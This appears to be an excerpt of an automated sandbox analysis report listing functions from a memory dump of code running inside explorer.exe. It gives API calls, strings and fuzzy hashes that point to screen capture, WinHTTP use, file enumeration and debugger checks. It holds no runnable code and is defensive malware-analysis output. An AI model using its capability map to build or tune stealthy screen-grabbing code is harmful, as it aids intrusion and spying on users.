Opcode Fuzzy Hash: 0311785a7529f31dd91a8fde15ec96c91375ead30ef5ac0c05c8c377e2f3f5f6
Instruction Fuzzy Hash: 8881C2B1600B1AABE724DF6CCC82F6AB3B9FF45724F24462EE459D6781E770D9008791

Uniqueness

Uniqueness Score: -1.00%

Function 008B7CC0 Relevance: 7.6, APIs: 5, Instructions: 95
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateCompatibleDC.GDI32(?), ref: 008B7D36
CreateCompatibleBitmap.GDI32(?,?,?), ref: 008B7D45
BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 008B7D85
DeleteDC.GDI32 ref: 008B7DFA
DeleteObject.GDI32(?), ref: 008B7E04

Memory Dump Source

Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_891000_explorer.jbxd

Similarity

API ID: CompatibleCreateDelete$BitmapObject
String ID:
API String ID: 418092405-0
Opcode ID: 6e4faa0b39a9cc9e3e5d4aa2ba0819d98098b63a5d0b0067b7482abf084a04f3
Instruction ID: a8db767e62fe83d706219d049ea62e5b5e1ae38c6efb1f2b57b4c49dcf3da3c0
Opcode Fuzzy Hash: 6e4faa0b39a9cc9e3e5d4aa2ba0819d98098b63a5d0b0067b7482abf084a04f3
Instruction Fuzzy Hash: 7A318B3150C385AB8B208B29CD848BEBEA8FFC5798F14896FF159CA360C335D951DB52

Uniqueness

Uniqueness Score: -1.00%

Function 008B7F64 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemMetrics.USER32(00000000), ref: 008B7F6B
CreateDCW.GDI32(?,00000000,00000000,00000000), ref: 008B8000
DeleteDC.GDI32(00000000), ref: 008B801B

Strings

DISPLAY, xrefs: 008B7FD3

Memory Dump Source

Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_891000_explorer.jbxd

Similarity

API ID: CreateDeleteMetricsSystem
String ID: DISPLAY
API String ID: 2464958881-865373369
Opcode ID: 0b4acf09ae508e681e129e96b8e69432e228678b819663d4971aa6f05c767d62
Instruction ID: d359b73e22f29232826fb7315ab886f658291a77e06fceb9329c6ad79549fecd
Opcode Fuzzy Hash: 0b4acf09ae508e681e129e96b8e69432e228678b819663d4971aa6f05c767d62
Instruction Fuzzy Hash: 0911B67090C300AFD7089F68EC999797BB5FBA8344F10805EF84ACB3A1DA756C50CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 008AB96E Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 193
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wsprintfW.USER32 ref: 008ABA2F

Strings

winhttp.dll, xrefs: 008AB97D, 008AB982, 008AB9A9, 008AB9CD, 008AB9F6, 008ABA38, 008ABA54, 008ABA78, 008ABACB, 008ABB31, 008ABB84, 008ABBC0

Memory Dump Source

Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_891000_explorer.jbxd

Similarity

API ID: wsprintf
String ID: winhttp.dll
API String ID: 2111968516-4126855447
Opcode ID: 25b79d3326ad1207203fc6ec360945d3a34d4737460fb0a8574124fba6a9aced
Instruction ID: bedaa750e00ba97454d35cbe38956e35d5f46e90c34dc373afa5e91665cf0e69
Opcode Fuzzy Hash: 25b79d3326ad1207203fc6ec360945d3a34d4737460fb0a8574124fba6a9aced
Instruction Fuzzy Hash: 91512370908300BFE6245E258C16FAFBAE4FFD6B95F00092DFA55E2791D7266904C673

Uniqueness

Uniqueness Score: -1.00%

Function 008D4594 Relevance: 3.0, APIs: 2, Instructions: 22
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000000,00000000,?,008D76D8,?,00000000,?,?,008D75F4,?,00000007,?,?,008D7D30,?,?), ref: 008D45AA
GetLastError.KERNEL32(?,?,008D76D8,?,00000000,?,?,008D75F4,?,00000007,?,?,008D7D30,?,?), ref: 008D45B5

Memory Dump Source

Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_891000_explorer.jbxd

Similarity

API ID: ErrorFreeHeapLast
String ID:
API String ID: 485612231-0
Opcode ID: 5fb0fea837ada8a507cd63a04380c71e2f6a38d5ef4cb7e10b89ad3e15729631
Instruction ID: 630d1e8408a5c3b1fd873c6f9095d8ab9ae78c982b281c0f24e74888d9e9a52f
Opcode Fuzzy Hash: 5fb0fea837ada8a507cd63a04380c71e2f6a38d5ef4cb7e10b89ad3e15729631
Instruction Fuzzy Hash: 0FE04632A00604ABCB123FA4FD09B9A3F68FB403A5F105125F608DA161EA718941CF90

Uniqueness

Uniqueness Score: -1.00%

Function 008A68BC Relevance: 1.8, APIs: 1, Instructions: 313
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_strlen.LIBCMT ref: 008A68F9

Memory Dump Source

Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_891000_explorer.jbxd

Similarity

API ID: _strlen
String ID:
API String ID: 4218353326-0
Opcode ID: f1283c71e887eaf81ebd0fe75a63c3aeecff2052b893f4fceff83a0d63054a3b
Instruction ID: 02d0aa914c3d395ce483c357f8a81e5b83f0236d8aaa8f3e7357e1622894f273
Opcode Fuzzy Hash: f1283c71e887eaf81ebd0fe75a63c3aeecff2052b893f4fceff83a0d63054a3b
Instruction Fuzzy Hash: B8C1E7B1904B409FE724CF29C880A6BB7E5FF89314F14892DE5AAC3790E774E944CB56

Uniqueness

Uniqueness Score: -1.00%

Function 008D9D02 Relevance: 1.6, APIs: 1, Instructions: 140
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTimeZoneInformation.KERNELBASE(00000000,00000000,00000000,008DA1D8,008A5109,?), ref: 008D9DB6

Part of subcall function 008D9383: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,008DD3BE,?,00000000,-00000008), ref: 008D942F

Memory Dump Source

Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_891000_explorer.jbxd

Similarity

API ID: ByteCharInformationMultiTimeWideZone
String ID:
API String ID: 1123094072-0
Opcode ID: 3fd1d8581f1c64a231c3f3d9014bd166484f9bc5329be23291a436d5e02dab67
Instruction ID: b9bbc6c20b89548104f3ef25111c571619ce540ef4ae50d82169ae80c19c0836
Opcode Fuzzy Hash: 3fd1d8581f1c64a231c3f3d9014bd166484f9bc5329be23291a436d5e02dab67
Instruction Fuzzy Hash: 3041B071900214BFDB10AFA9DC02E6A7FA9FF01760F108266F948E73A2E7719D109B91

Uniqueness

Uniqueness Score: -1.00%

Function 008DC6E8 Relevance: 1.5, APIs: 1, Instructions: 44
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 008D4EDF: RtlAllocateHeap.NTDLL(00000000,0089BD04,008ECE74), ref: 008D4F11

RtlReAllocateHeap.NTDLL(00000000,?,00894DA9), ref: 008DC745

Memory Dump Source

Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_891000_explorer.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 345e68efbaddac7b18a749663ac789d358a6b9a4077ba09bd0dcf340a596f142
Instruction ID: 8e23e9c777adc8936d7b37130f1e8c1b276ccdeff286bd3f3e0664e277fd0704
Opcode Fuzzy Hash: 345e68efbaddac7b18a749663ac789d358a6b9a4077ba09bd0dcf340a596f142
Instruction Fuzzy Hash: ECF096326411176B8B212A6DAC41F6B67A8FF827F0F255327F814EA391EB30DC01DDA5

Uniqueness

Uniqueness Score: -1.00%

Function 008D4EDF Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,0089BD04,008ECE74), ref: 008D4F11

Memory Dump Source

Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_891000_explorer.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 464d2fe312c8eb233f139b54a895eb2e6b331080971124192e928471ce59c73e
Instruction ID: 25e420749024d4e883e781e164dbe2be3d1b7a2c938f5e92a79b1a7297752cee
Opcode Fuzzy Hash: 464d2fe312c8eb233f139b54a895eb2e6b331080971124192e928471ce59c73e
Instruction Fuzzy Hash: BCE0E5219042916BD62027299C00F5A3B68FF813B4F112333EC06D63E1DF70DC019AA1

Uniqueness

Uniqueness Score: -1.00%

Function 008D66A0 Relevance: 1.5, APIs: 1, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_891000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 03a1950dfdb368bf32c07b3c03b43b41575a5866e49038d0890f62cb3d8ff67d
Instruction ID: c0adc5fda5803c23c82044cef67a87cc2d2ff0ea182089dea1fe94637bf3876e
Opcode Fuzzy Hash: 03a1950dfdb368bf32c07b3c03b43b41575a5866e49038d0890f62cb3d8ff67d
Instruction Fuzzy Hash: 77E0E631D41629678B216E26AC05F563F58FF61B50B098216AD04E7351EA70EC158DE1

Uniqueness

Uniqueness Score: -1.00%

Function 008B56CF Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

ExitProcess.KERNEL32 ref: 008B5715

Memory Dump Source

Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_891000_explorer.jbxd

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 3d98823dad7f0b977dcf3705bc54510897eafc2df10dd899162edc642469e9e3
Instruction ID: f90eb397b9bb615d38f51e8d587b9efceb860f7f5b2e51bdd0a4fff538ec2dda
Opcode Fuzzy Hash: 3d98823dad7f0b977dcf3705bc54510897eafc2df10dd899162edc642469e9e3
Instruction Fuzzy Hash: 2AE04F90A58A488BEE20266C04893BD2745FF23315FB44A56B04ADE355CB28C8825A57

Uniqueness

Uniqueness Score: -1.00%

Function 008AE80E Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

GetVolumeInformationW.KERNELBASE(008E5FF0,00000000,00000000,?,00000000,00000000,00000000,00000000,204B3ED8,?,008AE18F), ref: 008AE822

Memory Dump Source

Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_891000_explorer.jbxd

Similarity

API ID: InformationVolume
String ID:
API String ID: 2039140958-0
Opcode ID: 53c980becff237905a705d4c4b3e735f898ca2ef11ce9f60a57fd886345601ac
Instruction ID: a56f4d0180b2d055b8961d6e21940e3a797b82467e5dcb84155b81f1451a5ba8
Opcode Fuzzy Hash: 53c980becff237905a705d4c4b3e735f898ca2ef11ce9f60a57fd886345601ac
Instruction Fuzzy Hash: D8D002F2A552607FB2609F29AC49CB37EDCEE456603150564BC89C6204E5215D9186F2

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 008948AC Relevance: 23.7, APIs: 5, Strings: 8, Instructions: 989stringCOMMON

Download Yara Rule

APIs

lstrcatW.KERNEL32(?,?), ref: 00894F19
lstrcatW.KERNEL32(?,?), ref: 00895161

Strings

@iN, xrefs: 00894C57
s`^W, xrefs: 008957AD
aK6, xrefs: 00894C11
aK6, xrefs: 00894D66
s`^W, xrefs: 00894F95
-"^', xrefs: 00894AB3
r`^W, xrefs: 008949B1
Default, xrefs: 0089533B

Memory Dump Source

Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_891000_explorer.jbxd

Similarity

API ID: lstrcat
String ID: -"^'$@iN$Default$aK6$aK6$r`^W$s`^W$s`^W
API String ID: 4038537762-3820544866
Opcode ID: fa04e29abee7e9a10b501494cdeccde1e1be2a6495c7c6ac6a8e15bd9db58aea
Instruction ID: f7de352ac9527990fdeb142363c1c7b9b3a5fd7bff4e63c98bbe612d96524388
Opcode Fuzzy Hash: fa04e29abee7e9a10b501494cdeccde1e1be2a6495c7c6ac6a8e15bd9db58aea
Instruction Fuzzy Hash: D0829170D00659CFDF29EF98DC85AAEBBB0FB54314F28192AE515FB390D7318A418B42

Uniqueness

Uniqueness Score: -1.00%

Function 008AAEF8 Relevance: 21.6, APIs: 7, Strings: 5, Instructions: 605COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 008AB0B6
_strlen.LIBCMT ref: 008AB400

Strings

ame=, xrefs: 008AB636
\f{, xrefs: 008AB3DD
ilen, xrefs: 008AB63E
pA, xrefs: 008AB13A
"; f, xrefs: 008AB646

Memory Dump Source

Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_891000_explorer.jbxd

Similarity

API ID: _strlen
String ID: "; f$\f{$ame=$ilen$pA
API String ID: 4218353326-1851456184
Opcode ID: 975c5c8d29637072d8455104547c0b0229486474a4523c092e2d00ed02df817c
Instruction ID: 7cef24c856dea82f75d562b80d3074a87361fe30b9b3f143740d8b5ec3784875
Opcode Fuzzy Hash: 975c5c8d29637072d8455104547c0b0229486474a4523c092e2d00ed02df817c
Instruction Fuzzy Hash: 9C3281B15083459FEB288F18C89552EBAE0FB96344F24892EF699CBB51E734D944CB07

Uniqueness

Uniqueness Score: -1.00%

Function 008AA2C2 Relevance: 12.9, APIs: 6, Strings: 1, Instructions: 690COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 008AA5D8

Strings

\8, xrefs: 008AA881

Memory Dump Source

Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_891000_explorer.jbxd

Similarity

API ID: _strlen
String ID: \8
API String ID: 4218353326-3492067470
Opcode ID: 29143ea9a899869ffa5a6586b57a09f3073fca7c93e6b9750da2a5301f3a2b94
Instruction ID: 5a0cf6d763eefeb8525965ddd959d3fd78f8c39410a5f269c149c08807e7a780
Opcode Fuzzy Hash: 29143ea9a899869ffa5a6586b57a09f3073fca7c93e6b9750da2a5301f3a2b94
Instruction Fuzzy Hash: 4942B1B1A083459BE7289F18C885A3EB6E0FB96714F54492EF185DBE51E375C890EB03

Uniqueness

Uniqueness Score: -1.00%

Function 008A75F9 Relevance: 12.3, Strings: 9, Instructions: 1072COMMON

Download Yara Rule

Strings

\&T!, xrefs: 008A7A6C
$uhb, xrefs: 008A7775
\&T!, xrefs: 008A82AB
vYh, xrefs: 008A7A3B
[&T!, xrefs: 008A7698
vYh, xrefs: 008A7614
%uhb, xrefs: 008A80BA
%uhb, xrefs: 008A7C17
\&T!, xrefs: 008A8634

Memory Dump Source

Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_891000_explorer.jbxd

Similarity

API ID:
String ID: $uhb$%uhb$%uhb$[&T!$\&T!$\&T!$\&T!$vYh$vYh
API String ID: 0-2920014731
Opcode ID: e0259e4c13444c2b36846dcb8ec876b616d13b0064304453c7ef4f1c26f7aa9c
Instruction ID: 534de91ed7290fab9129db7e3ba6ddcf88967b2d02ddf1a51b471358c6159cba
Opcode Fuzzy Hash: e0259e4c13444c2b36846dcb8ec876b616d13b0064304453c7ef4f1c26f7aa9c
Instruction Fuzzy Hash: 2A9281B1D08609CBEF28CF9CCD856BDBAB0FB26304F64095AE515EBB50D7708941DB62

Uniqueness

Uniqueness Score: -1.00%

Function 00898492 Relevance: 9.5, Strings: 6, Instructions: 1975COMMON

Download Yara Rule

Strings

vmz, xrefs: 00899450
vmz, xrefs: 00899457
vmz, xrefs: 008995D0
vmz, xrefs: 008995F3
vmz, xrefs: 008994AE
vmz, xrefs: 008994D1

Memory Dump Source

Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_891000_explorer.jbxd

Similarity

API ID:
String ID: vmz$vmz$vmz$vmz$vmz$vmz
API String ID: 0-2631656845
Opcode ID: 1afdaaae3841cfea759a3e029d5645fa2e01477f47c6c5e14a5a5b40943efff7
Instruction ID: 814cfd6e617f88223a1c428d37f449d9079544bee563000e8d4b46818cfec7de
Opcode Fuzzy Hash: 1afdaaae3841cfea759a3e029d5645fa2e01477f47c6c5e14a5a5b40943efff7
Instruction Fuzzy Hash: 43D27FB7B893144BD308CE59EC9129AF2D3ABD4624F1F943DE889D3301EE79D9074689

Uniqueness

Uniqueness Score: -1.00%

Function 008BF152 Relevance: 7.8, APIs: 1, Strings: 3, Instructions: 811COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 008BFA18

Strings

@T>, xrefs: 008BFE4F
@T>, xrefs: 008BF77A
W}6F, xrefs: 008BF2B7

Memory Dump Source

Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_891000_explorer.jbxd

Similarity

API ID: _strlen
String ID: @T>$ @T>$W}6F
API String ID: 4218353326-3356682572
Opcode ID: f93b3d3a7018bfd3c5619bed916e8cd36f9fad8a5c4c6b68a9bd33883ac0131f
Instruction ID: 8bf2d44a232abd80b9c84422be2aa9d337a6742eeff8cf811629619bc788d8f8
Opcode Fuzzy Hash: f93b3d3a7018bfd3c5619bed916e8cd36f9fad8a5c4c6b68a9bd33883ac0131f
Instruction Fuzzy Hash: D2626EB1508345DFDB259F2CC9846AEBBE0FB95754F204D2EE699CB352E630C8809B13

Uniqueness

Uniqueness Score: -1.00%

Function 008C0073 Relevance: 6.4, APIs: 1, Strings: 3, Instructions: 405stringCOMMON

Download Yara Rule

APIs

lstrcmpiW.KERNEL32(?,008E4350), ref: 008C0457

Strings

@y, xrefs: 008C0122
@y, xrefs: 008C0538
@y, xrefs: 008C053D

Memory Dump Source

Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_891000_explorer.jbxd

Similarity

API ID: lstrcmpi
String ID: @y$@y$@y
API String ID: 1586166983-2029738505
Opcode ID: 65d4b1dd54c618f77c7b3024ec3752433599122a9fa349faf84aa2dbca84b9f8
Instruction ID: 4dbef05b371d6db95408846a6638beed5884af73521a9c592477ecf0db8dd372
Opcode Fuzzy Hash: 65d4b1dd54c618f77c7b3024ec3752433599122a9fa349faf84aa2dbca84b9f8
Instruction Fuzzy Hash: 2BE1F4B1608708DBDB289E688981B2DB7F4FB54794F258A1FE095DB750E235D880AF43

Uniqueness

Uniqueness Score: -1.00%

Function 008D55B4 Relevance: 6.3, APIs: 4, Instructions: 337COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 008D5641

Memory Dump Source

Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_891000_explorer.jbxd

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: 9328256bcef8871b420e9057a9a0bf9e5c86318a1976eafcfd1e5010d7695664
Instruction ID: 5544c384e27bacfa0988a142728a08347e1f64cd1175eeed4a954d11de040c64
Opcode Fuzzy Hash: 9328256bcef8871b420e9057a9a0bf9e5c86318a1976eafcfd1e5010d7695664
Instruction Fuzzy Hash: 5EB11432A04A499FDB158F68C891BEEBBA5FF55354F24836BE801EB341D634DD01CB61

Uniqueness

Uniqueness Score: -1.00%

Function 008D8133 Relevance: 6.1, APIs: 4, Instructions: 129fileCOMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 008D81CE
FindNextFileW.KERNEL32(00000000,?), ref: 008D8249
FindClose.KERNEL32(00000000), ref: 008D826B
FindClose.KERNEL32(00000000), ref: 008D828E

Memory Dump Source

Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_891000_explorer.jbxd

Similarity

API ID: Find$CloseFile$FirstNext
String ID:
API String ID: 1164774033-0
Opcode ID: 98cd9e10d12fc7289f893853cecb2a747a5664d48236b19551443c077e4a9876
Instruction ID: 0d39455fd2a4309f6726efcc0712a9a585f29290bf24a455207e1bd0b9adf26c
Opcode Fuzzy Hash: 98cd9e10d12fc7289f893853cecb2a747a5664d48236b19551443c077e4a9876
Instruction Fuzzy Hash: D641D471A00619EFDF20EF69CC89ABAB7B9FF85304F104296E505D7240EF309E858B60

Uniqueness

Uniqueness Score: -1.00%

Function 008A4593 Relevance: 6.1, APIs: 1, Strings: 2, Instructions: 837COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 008A476F

Strings

0, xrefs: 008A4E94
8, xrefs: 008A4E8C

Memory Dump Source

Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_891000_explorer.jbxd

Similarity

API ID: _strlen
String ID: 0$8
API String ID: 4218353326-46163386
Opcode ID: 81a5bca18832ed9320afcd4e6983074b179dbd0a5867f300485f841f4c7624b1
Instruction ID: 04c9970208efbee3e159aaa787bea38d3528cbeb80a2f51f7d90c6b0f6c6632e
Opcode Fuzzy Hash: 81a5bca18832ed9320afcd4e6983074b179dbd0a5867f300485f841f4c7624b1
Instruction Fuzzy Hash: 2F7243716083449FEB14CF18C880A6ABBE2FFCA314F14892DF98987761D7B1D954CB92

Uniqueness

Uniqueness Score: -1.00%

Function 008C1355 Relevance: 6.1, APIs: 4, Instructions: 73COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 008C1361
IsDebuggerPresent.KERNEL32 ref: 008C142D
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 008C144D
UnhandledExceptionFilter.KERNEL32(?), ref: 008C1457

Memory Dump Source

Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_891000_explorer.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: c78b70ac394588005bf3de805f22286560a382f278ecd3e458afd2c95ce61a30
Instruction ID: 33ee703b0b5a19286b1787066234e0ee23ce08cac299c7bf73abcf307fad07eb
Opcode Fuzzy Hash: c78b70ac394588005bf3de805f22286560a382f278ecd3e458afd2c95ce61a30
Instruction Fuzzy Hash: 20311475D052599BDF20DFA4D989BCDBBB8FF08304F1040AAE409AB250EB719A858F45

Uniqueness

Uniqueness Score: -1.00%

Function 008B6303 Relevance: 5.5, Strings: 4, Instructions: 523COMMON

Download Yara Rule

Strings

#sQ, xrefs: 008B65B7
@y, xrefs: 008B65F8
#sQ, xrefs: 008B6938
@y, xrefs: 008B6755

Memory Dump Source

Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_891000_explorer.jbxd

Similarity

API ID:
String ID: #sQ$#sQ$@y$@y
API String ID: 0-498145420
Opcode ID: 3a16cafa62f621866b862b2f51a42754290c2344683ec8b872ce3664142f6263
Instruction ID: 102580039bb6b6179940fdc86cde94c084fcff6266bb3c57e098590702dfec86
Opcode Fuzzy Hash: 3a16cafa62f621866b862b2f51a42754290c2344683ec8b872ce3664142f6263
Instruction Fuzzy Hash: 021207B1508305DBDB249F58D8916AEB6E0FB64718F148D2FF285DB3A1F639D9A08703

Uniqueness

Uniqueness Score: -1.00%

Function 008D46AB Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 008D47A3
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 008D47AD
UnhandledExceptionFilter.KERNEL32(008CDBCF,?,?,?,?,?,00000000), ref: 008D47BA

Memory Dump Source

Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_891000_explorer.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 5382a0c9c4504c7a57180675044603880a9616bd89decf23ec6024fbbb07042e
Instruction ID: 38231219a366031bfcd35ed4b3239caeadd81812adab8730c89189cbed5a56f6
Opcode Fuzzy Hash: 5382a0c9c4504c7a57180675044603880a9616bd89decf23ec6024fbbb07042e
Instruction Fuzzy Hash: B531B37491122C9BCB21DF68DC89B9DBBB4FF08310F5042EAE51CA6251EB709F828F45

Uniqueness

Uniqueness Score: -1.00%

Function 008A415D Relevance: 3.9, Strings: 3, Instructions: 120COMMON

Download Yara Rule

Strings

3333, xrefs: 008A41B2
UUUU, xrefs: 008A41A9
UUUU, xrefs: 008A41DD

Memory Dump Source

Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_891000_explorer.jbxd

Similarity

API ID:
String ID: 3333$UUUU$UUUU
API String ID: 0-1588839328
Opcode ID: 0e8f0c4c146071c2570079ad13cd9b927d2608b87e89d9503b1ce95756e49c8e
Instruction ID: e4004262e8e754ad97fe433d9968e54a1d6fe1c2a10b3b08569196aadd44a931
Opcode Fuzzy Hash: 0e8f0c4c146071c2570079ad13cd9b927d2608b87e89d9503b1ce95756e49c8e
Instruction Fuzzy Hash: 6F41BCB16142048BEF188F59C88431277E6FBD9324F59916AEE05CB78AE7B4C985CF80

Uniqueness

Uniqueness Score: -1.00%

Function 008CF0C0 Relevance: 3.4, APIs: 2, Instructions: 449COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_891000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a8d926b658cc580a40ef955d20bc2bc59daf43b2ff7d7c38283f6bfbfef1402
Instruction ID: ad25f088a0c9aecd93a2bd40003db80eeb7658259a8ba26d4e9f348f7d0aad67
Opcode Fuzzy Hash: 7a8d926b658cc580a40ef955d20bc2bc59daf43b2ff7d7c38283f6bfbfef1402
Instruction Fuzzy Hash: 40F11C75E002199BDF18CFA9D880BAEB7B2FF88314F15826EE915E7381D73099058B94

Uniqueness

Uniqueness Score: -1.00%

Function 008DD850 Relevance: 2.9, APIs: 1, Instructions: 1436COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 008DDA34

Memory Dump Source

Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_891000_explorer.jbxd

Similarity

API ID: __floor_pentium4
String ID:
API String ID: 4168288129-0
Opcode ID: ba1c417c5f41dc388e49966d63b2d4c853ecc702be54ee8b0e40a70fbaab688e
Instruction ID: 2db794a802a08805729838239bdcd996de598cb0b203ca4d55e3729dc8aa8a81
Opcode Fuzzy Hash: ba1c417c5f41dc388e49966d63b2d4c853ecc702be54ee8b0e40a70fbaab688e
Instruction Fuzzy Hash: F3D21571E086298FDB65DE28DC407EAB7B5FB44304F1446EAD40DEB240EB78AE858F41

Uniqueness

Uniqueness Score: -1.00%

Function 008A3740 Relevance: 1.9, APIs: 1, Instructions: 353COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 008A38B2

Memory Dump Source

Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false

